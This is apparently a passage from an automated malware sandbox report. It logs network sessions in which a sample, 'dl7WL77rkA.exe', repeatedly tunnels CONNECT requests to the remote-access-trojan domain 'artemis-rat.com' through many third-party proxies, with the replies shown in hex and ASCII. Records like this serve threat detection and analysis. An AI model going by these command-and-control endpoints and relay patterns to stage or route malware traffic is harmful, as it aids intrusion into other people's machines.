                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.762351036 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 65
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="Proxy"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                                                                                                                                                                                            Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1168192.168.2.553277104.19.225.70803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.539269924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.693546057 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1169192.168.2.553278104.24.220.52803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.540076971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.694797039 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1170192.168.2.553191200.10.73.21056783876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.540460110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1171192.168.2.551428212.127.93.18580813876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.541166067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1172192.168.2.553122188.173.14.99406663876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.541733980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.389265060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.405596018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405667067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.405266047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:58.910657883 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1173192.168.2.553157170.64.222.14180003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.555176973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.874773979 CET32INHTTP/1.0 504 Gateway Timeout


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1174192.168.2.55319946.182.6.69361123876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.555771112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1175192.168.2.55324813.208.168.17931283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.555773973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.824778080 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1176192.168.2.553132210.72.11.4680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.556129932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.936203957 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1177192.168.2.553201196.20.125.12980833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.556699038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1178192.168.2.553136148.72.209.17429063876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.564893007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.355210066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:44.446161032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.514698029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:50.723165035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.905190945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:59.108283997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1179192.168.2.552326120.194.4.157823876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.568173885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.701942921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.661421061 CET319INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 170
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:49.664738894 CET319INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 170
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:55.672926903 CET319INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 170
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:07.689439058 CET319INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 170
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:31:31.789619923 CET319INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 170
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>
                                                                                                                                                                                                                                                            Mar 11, 2024 03:32:19.883738041 CET319INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: openresty
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:46 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 170
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1180192.168.2.553325172.67.181.103803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.569870949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.724399090 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:42 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1181192.168.2.55314739.108.227.108803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.570430994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.904612064 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
